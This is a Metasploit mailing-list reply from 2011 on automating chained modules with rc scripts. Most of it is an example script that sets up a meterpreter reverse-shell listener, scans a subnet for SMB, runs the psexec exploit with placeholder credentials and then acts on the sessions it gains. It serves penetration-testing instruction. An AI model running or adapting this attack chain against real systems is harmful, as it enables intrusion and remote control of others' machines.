Metasploit mailing list archives
Re: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future?
From: Jonathan Cran <jcran () 0x0e org>
Date: Mon, 28 Nov 2011 12:31:38 -0600
On Mon, Nov 28, 2011 at 9:27 AM, Tod Beardsley <todb () metasploit com> wrote:
> > When I write an auxiliary module, is it possible to make an attack such that two modules or attacks can be combined into one attack, with real-time change in (run_timed, etc.) value for each module to process?
>
> Sorry, I'm not sure what you're asking. In terms of doing things in response to network conditions, it's totally possible to control behavior based on packets received -- maybe the Bailiwicked modules do something like what you want?
>
> https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/spoof/dns/bailiwicked_domain.rb
>
> If you're looking for something like, "When Module X is successful, run Module Y, otherwise, run Module Z" then I imagine you could automate something like that via an rc script that does some <ruby> evaluation in between each module. I don't have an example handy, though.

If you're interested in the latter case, you might want to take a look at the example RC files published by darkoperator (http://www.darkoperator.com/), or kernelsmith / myself (at http://blog.pentestify.com). The original post on how to automate the console (http://blog.metasploit.com/2010/03/automating-metasploit-console.html) will prove useful reading as well.

Here's a contrived rc file which runs two modules based on a condition.

<CODE>
# Set up a handler
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST z.z.z.z
set LPORT 4444
exploit -z -j

# Run a scanner module
use auxiliary/scanner/smb_version
set RHOSTS x.x.x.x/24
run

# Sleep til something happens - just an example
<ruby>
# find_all_by_state returns an Array, and an empty Array is truthy in Ruby,
# so test for emptiness explicitly; otherwise the wait never happens.
select(nil, nil, nil, 1) while framework.db.workspace.services.find_all_by_state("open").empty?
</ruby>

# Run an exploit module - note that this could be done for all hosts
# matching a certain condition w/ a ruby block and a looped run_single()
use windows/smb/psexec
set RHOST x.x.x.x
set SMBUser abc
set SMBPass def
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST z.z.z.z
exploit -z

# Interact with all generated sessions
<ruby>
framework.sessions.each do |session|
  # sessions look like: [0, <session_obj>]
  session_num = session.first
  session_obj = session.last

  # tell the console to operate on this session
  # and run the current module against it.
  run_single("set SESSION #{session_num}")
  run_single("run")
end
</ruby>
</CODE>